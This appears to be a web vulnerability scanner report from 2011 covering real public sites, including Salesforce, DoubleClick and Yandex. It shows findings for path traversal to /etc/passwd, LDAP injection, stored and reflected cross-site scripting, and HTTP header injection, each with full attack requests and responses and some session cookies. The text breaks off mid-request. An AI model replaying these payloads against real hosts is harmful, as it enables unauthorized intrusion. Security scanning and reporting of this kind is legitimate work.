Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Content-Length: 6664

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...
2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The REST URL parameter 1 is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload servlet../../../../../../../../etc/passwd was submitted in the REST URL parameter 1. The requested file was returned in the application's response.

Request

POST /servlet../../../../../../../../etc/passwd/servlet.WebToLead?encoding=UTF-8 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]
Content-Length: 198

oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.html&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45

Response

HTTP/1.1 404 Not Found
Server: SFDC
Cache-Control: max-age=0
Cache-Control: must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 23502
Date: Mon, 25 Apr 2011 16:08:38 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="Content-Type" co
...[SNIP]...
-sjl.ops.sfdc.net
www.salesforce.com
/cms/system/handler/handle404.html
Server error 404
Not Found
The requested resource &quot;/cms/etc/passwd/servlet.WebToLead&quot; was not found on the server.
siteRoot:/sites/sfdc
-->
...[SNIP]...
3. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 2a0e35b7bd3690da)(sn=* and 2a0e35b7bd3690da)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)(sn=*&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2a0e35b7bd3690da&#41;&#40;sn=exp=1&initExp=Mon Apr 25 14:36:04 2011&recExp=Mon Apr 25 14:36:04 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)!(sn=*&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2a0e35b7bd3690da&#41;!&#40;sn=exp=1&initExp=Mon Apr 25 14:36:04 2011&recExp=Mon Apr 25 14:36:04 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/
4. Cross-site scripting (stored)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter submitted to the URL /shavlik/index.cfm is copied into an HTML comment at the URL /shavlik/index.cfm. The payload 744fd--><script>alert(1)</script>aa703b77027 was submitted in the h parameter. This input was returned unmodified in a subsequent request for the URL /shavlik/index.cfm.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /shavlik/index.cfm?m=521&pg=372&h=0744fd--><script>alert(1)</script>aa703b77027&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Request 2

GET /shavlik/index.cfm?m=521&pg=372&h=0&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 0744fd--><script>alert(1)</script>aa703b77027|372 -- -->
...[SNIP]...
5. HTTP header injection  previous  next
There are 9 instances of this issue:

5.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lj.homepage/loggedout

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69b58%0d%0afb4aa952766 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69b58%0d%0afb4aa952766/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=2623414837? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69b58
fb4aa952766/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=2623414837:
Date: Mon, 25 Apr 2011 14:33:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
5.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d65f3%0d%0ab88a010799e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifd65f3%0d%0ab88a010799e?1303741320269 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifd65f3
b88a010799e:
Date: Mon, 25 Apr 2011 14:56:32 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
5.3. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.yandex.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c396e%0d%0ac1277611b7a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ruc396e%0d%0ac1277611b7a?67253133 HTTP/1.1
Host: bs.yandex.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:34:43 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:34:43 GMT
Expires: Mon, 25 Apr 2011 14:34:43 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ruc396e
c1277611b7a/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ruc396e
c1277611b7a,1981869761303741204?67253133
Content-Length: 0

5.4. http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://click-here-to-listen.com
Path:   /players/iaPlay13.swf

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload baa49%0d%0ab09bbe6f887 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /baa49%0d%0ab09bbe6f887/iaPlay13.swf?x=2108535237WCZSIT HTTP/1.1
Host: click-here-to-listen.com
Proxy-Connection: keep-alive
Referer: http://playaudiomessage.com/play.asp?m=535237&f=WCZSIT&ps=13&c=FFFFFF&pm=2&h=25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved
Location: http://sfo.click-here-to-listen.com/baa49
b09bbe6f887/iaPlay13.swf
Connection: close

5.5. http://click-here-to-listen.com/players/iaPlay13.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://click-here-to-listen.com
Path:   /players/iaPlay13.swf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fdaa7%0d%0aa82a400e71b was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /players/fdaa7%0d%0aa82a400e71b?x=2108535237WCZSIT HTTP/1.1
Host: click-here-to-listen.com
Proxy-Connection: keep-alive
Referer: http://playaudiomessage.com/play.asp?m=535237&f=WCZSIT&ps=13&c=FFFFFF&pm=2&h=25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved
Location: http://sfo.click-here-to-listen.com/players/fdaa7
a82a400e71b
Connection: close

5.6. http://pretty.ru/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pretty.ru
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9656f%0d%0a539e8d0607b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9656f%0d%0a539e8d0607b HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domhit=1; randomhit=177203261; LP_CH_C=love_cookies; __utmz=1.1303741245.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.850278810.1303741245.1303741245.1303741245.1; __utmc=1; __utmb=1.1.10.1303741245

Response

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 25 Apr 2011 14:56:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Location: /a-main/param-notfound/login-9656f
539e8d0607b:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:56:13 GMT
Content-Length: 100

<!-- 0.019777 --><!--hostip=kenobi-->
<!--revision=2011-04-22-->
<!--revision_tmpl=2011-04-22_v2-->
5.7. http://www.instantengage.com/operator_status.php [on parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.instantengage.com
Path:   /operator_status.php

Issue detail

The value of the on request parameter is copied into the location response header. The payload 1225d%0d%0a6b625487c7a was submitted in the on parameter. This caused a response containing an injected HTTP header.

Request

GET /operator_status.php?acctid=1756&on=1225d%0d%0a6b625487c7a&off=http%3A%2F%2Fwww.instantengage.com%2Fimages_store%2Fset6_2.gif&unique=2011325105357 HTTP/1.1
Host: www.instantengage.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 15:46:07 GMT
Server: Apache/2.0.50 (Fedora)
X-Powered-By: PHP/4.3.8
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
location: 1225d
6b625487c7a
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

5.8. https://www.salesforce.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5719e%0d%0aad6007fb0ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5719e%0d%0aad6007fb0ac HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /5719e
ad6007fb0ac/
Date: Mon, 25 Apr 2011 16:09:37 GMT
Content-Length: 77

The URL has moved to <a href="/5719e
ad6007fb0ac/">/5719e
ad6007fb0ac/</a>
5.9. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 5adda%0d%0a7266c97a38c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

POST /servlet/5adda%0d%0a7266c97a38c?encoding=UTF-8 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]
Content-Length: 198

oid=00DC0000000Piy3&retURL=http%3A%2F%2Fwww.reputationchanger.com%2Fscheduled.html&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/5adda
7266c97a38c/?encoding=UTF-8
Date: Mon, 25 Apr 2011 16:08:43 GMT
Content-Length: 123

The URL has moved to <a href="/servlet/5adda
7266c97a38c/?encoding=UTF-8">/servlet/5adda
7266c97a38c/?encoding=UTF-8</a>
6. Cross-site scripting (reflected)  previous  next
There are 91 instances of this issue:

6.1. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 86c33<script>alert(1)</script>797754eeb was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_28966886c33<script>alert(1)</script>797754eeb HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A16F926F5AA4C8CAA4023FBBBAB7879A; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:23:18 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_28966886c33<script>alert(1)</script>797754eeb".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_28966886c33<script>
...[SNIP]...
6.2. http://an.yandex.ru/code/47934 [target-ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/47934

Issue detail

The value of the target-ref request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de788(a)f60c8b163e7 was submitted in the target-ref parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=de788(a)f60c8b163e7&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
